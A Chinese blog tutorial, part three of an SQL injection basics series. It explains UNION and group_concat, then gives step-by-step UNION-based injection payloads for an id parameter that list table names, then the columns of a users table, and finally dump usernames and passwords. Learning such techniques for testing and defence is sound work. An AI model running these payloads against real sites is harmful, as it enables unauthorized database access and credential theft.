sql注入基础(三)

最新推荐文章于 2024-06-19 09:37:53 发布
最新推荐文章于 2024-06-19 09:37:53 发布
阅读量619 收藏 4
点赞数 28
分类专栏: 网络安全 mysql 文章标签: sql 数据库 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46729014/article/details/137435874
版权

sql注入基础

什么是union

Union:对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序;

union注入

查询表名

information_schema数据库包含两个表,一个是tables存放数据库中所有的表,另一个是columns用来存放所有的列名

使用如下命令查询数据库表名

?id=' union select 1,table_name,3 from information_schema.tables --+

得到如下结果
在这里插入图片描述
但我们查询information_schema中tables表发现我们刚才得出的结果没有意义
此时我们加入查询语句

?id=' union select 1,table_name,3 from information_schema.tables where table_schema=database() --+

成功查出表名
在这里插入图片描述
但我们现在只查出这一个表名,但数据库中有很多表,这时我们要用group_concat(),那么什么是group_concat呢 group_concat(),手册上说明:该函数返回带有来自一个组的连接的非NULL值的字符串结果。
通俗点理解,其实是这样的:group_concat()会计算哪些行属于同一组,将属于同一组的列合并显示出来。要返回哪些列,由函数参数(就是字段名)决定。分组必须有个标准,就是根据group by指定的列进行分组。
合并的字段分隔符默认为逗号,可通过参数separator指定。
使table_name被group_concat()包裹起来

?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

得到所有数据库表名在这里插入图片描述

查询列名

查询到表名之后我们就要查询列名了,我们要查找users的信息

?id=-2' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+

得到列名
在这里插入图片描述

最终目标:拿到数据

已知数据库表名、列名再得到数据就简单了,使用基础查询语句即可

?id=-2' union select 1,2,group_concat(id,username,password) from users --+

在这里插入图片描述
得到账号密码等数据

脚底儿
关注
  • 28
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入基础.pdf
07-05
介绍SQL注入的原理,常见入侵与防御方式,手工注入或者工具注入
SQL注入基础知识
01-18
SQL注入基础知识的学习,可以对你有很大的帮助,避免在开发过程中出现更多的安全问题
SQL注入 基础
04-30
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
SQL注入基础和进阶.pdf
12-26
"SQL注入基础和进阶" SQL注入是指Web应用程序对用户输入的数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,那么攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。开发...
SQLAlchemy 连接池
youhebuke225的博客
06-17 195
调整这些参数可以帮助你更好地管理数据库连接,并减少因连接超时或服务器断开连接而导致的问题。记得根据你的应用程序的需求和数据库服务器的配置来合理设置这些参数。在 SQLAlchemy 中,确实可以通过配置连接池的参数来管理连接的超时和回收,从而确保连接在需要时能够被重新建立。SQLAlchemy 使用的是。作为其默认的连接池实现。为了配置这些参数,你可以在创建引擎时将它们传递给。
PostgreSQL源码分析——绑定变量
让我思考一下
06-18 155
这里分析一下函数中应用绑定变量的问题,但实际应用场景中,不推荐这么使用。
PostgreSQL源码分析——CREATE TYPE
让我思考一下
06-18 280
定义一个复合类型某种程度上就是定义一张新的表,表的rowtype就是复合类型。会看到创建一个复合类型的同时会创建一个同名的表。这个表可以在pg_class系统表中查到,但是通过\d等却查不到,也不能想表中插入数据,因为它并不是真正意义上的表,只是用表实现复合类型。这部分因为不是可优化语句,没有什么处理。这部分因为是Utility语句,没有什么处理的。创建复合类型,我们分析一下其源码实现。
SQL中distinct去重关键字的使用和count统计组合的使用
睡不醒的每天
06-13 514
distinct必须在列的前面,否则直接提示错误,当distinct作用于单列的的情况下,统计查询的结果为行数目的总数,包含null为空的数目。count(distinct 列名):根据指定的列统计记录总数,不包含重复的记录,不包括NULL或空的值。select distinct 列名1,列名2,列名3…select distinct 列名 from 表;也可以使用count(2)、count(3)等等。count(distinct 列名)
PostgreSQL源码分析——CREATE CAST
让我思考一下
06-18 270
语句自定义一个类型转换,数据库肯定有个地方将这个转换的信息存起来,这个地方就是pg_cast系统表。pg_cast系统表存在数据类型转换路径,包括内建和用户自定义的。函数的主要内容就是将用户自定义的类型转换信息插入到pg_cast系统表中。下面我们主要分析一下其源码,看一下是如何实现的。我们首先分析一下其语法解析部分,这部分比较简单,核心是。如何使用以及用法请参考PostgreSQL文档中。后续会重点分析一下这个函数。—— 定义一个用户自定义的类型转换。非常容易理解,下面我们重点分析一下。
PostgreSQL源码分析 —— CAST类型转换
让我思考一下
06-18 400
我们分析一下PostgreSQL中显式类型转换是如何实现的,在PostgreSQL中,显式类型转换可以用等同于。这里我们以为例进行分析。再结合之前对的分析,基本就弄清了一部分PostgreSQL中数据类型转换问题。当然要完整的理解类型转换还需要完整的理解PostgreSQL中的类型系统,后续还需要我们逐步的深入理解。
PostgreSQL的扩展(extensions)-常用的扩展-pg_stat_monitor
lee_vincent1的博客
06-13 1027
是 PostgreSQL 的一个扩展,它提供了一种先进的监控和统计 SQL 查询的方式,相比于标准的,它提供了更丰富和详细的查询统计信息。通过捕获和分析 SQL 查询的执行情况,帮助数据库管理员优化数据库性能。
SQL:按用户名复制权限
wudechun的博客
06-17 244
原来为每个用户添加菜单的访问权限时都是一个一个添加,但今天遇到有个新来的员工,需要具有与另一个员工相同的权限。新建一个用户后,如果还按之前的方式添加菜单的访问权限,将是很麻烦的事,于是需要设计一个权限复制的功能。用sql实现:一个数据表中有userid、menuid,根据userid=2筛选出menuid,然后将userid=3和前面筛选出的menuid再插入到本数据表中。但按这样来操作的话,最少都要3步,需要看看还有没有更优的方法,比如用一句SQL语句就实现。然后我自己再修改了查询对应用户的id的语句。
PostgreSQL源码分析——视图查询重写
让我思考一下
06-18 432
这里我们分析一下查询重写的过程,主要分析视图的查询重写的过程。
PostgreSQL源码分析——基础备份
让我思考一下
06-19 678
进行基础备份有2中方式,可使用pg_basebackup工具或其他备份工具进行备份,另一种是使用底层命令进行基础备份。pg_basebackup等工具其实是封装了底层命令,所以,为了更好的理解基础备份的过程,这里我们使用底层命令进行备份。并分析其中的源码实现。
PostgreSQL的系统视图pg_policies
lee_vincent1的博客
06-14 438
是 PostgreSQL 的一个系统视图,用于显示数据库中定义的行级安全策略(Row-Level Security Policies)。行级安全策略是一种访问控制机制,它允许你定义基于行的访问控制规则,通过策略来控制用户对特定行数据的访问。行级安全策略在 PostgreSQL 9.5 及之后的版本中引入,旨在增强数据库安全性,使其能够支持更细粒度的访问控制。
【译】SQLAlchemy文档:SQLAlchemy 统一教程
一只大鸽子的博客
06-12 1191
**SQLAlchemy** 是 Python **SQL工具包**和**ORM**,它为应用程序开发人员提供了 SQL 的全部功能和灵活性。它提供了一整套企业级持久性模式,专为高效和高性能的数据库访问而设计。
PostgreSQL源码分析——pg_basebackup
最新发布
让我思考一下
06-19 245
涉及到的代码主要在以及中。其实,pg_basebackup工具就是对底层API的封装,其主要过程是相同的,但具体到代码,并不是直接调用的函数,而是通过一些命令的形式,这些特殊的命令定义在中,后面我们会进行分析。
PostgreSQL源码分析——pg_control
让我思考一下
06-18 269
pg_control是PostgreSQL中一个很重要的文件,我们之前讲到过PostgreSQL的启动过程,启动过程中很重要的一项工作就是故障恢复,启动startup进程,回放WAL日志进行故障恢复,而从哪里开始进行回放呢?这个位置的保存一定是在磁盘中,而不是在内存中,假设数据库因故障崩溃,内存中的数据会丢失,所以,只有checkpointer进程在做checkpoint操作时不断的更新pg_control文件,使之持久化保存,数据库启动进行故障恢复时,读取该文件,获得故障恢复的起始位置。
CTFSQL注入基础知识
04-03
下面是CTF中SQL注入基础知识: 1. 什么是SQL注入SQL注入是指攻击者通过在应用程序的输入中插入恶意的SQL代码,从而绕过应用程序的验证和过滤机制,进而执行非法的数据库操作。攻击者可以通过SQL注入获取敏感...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值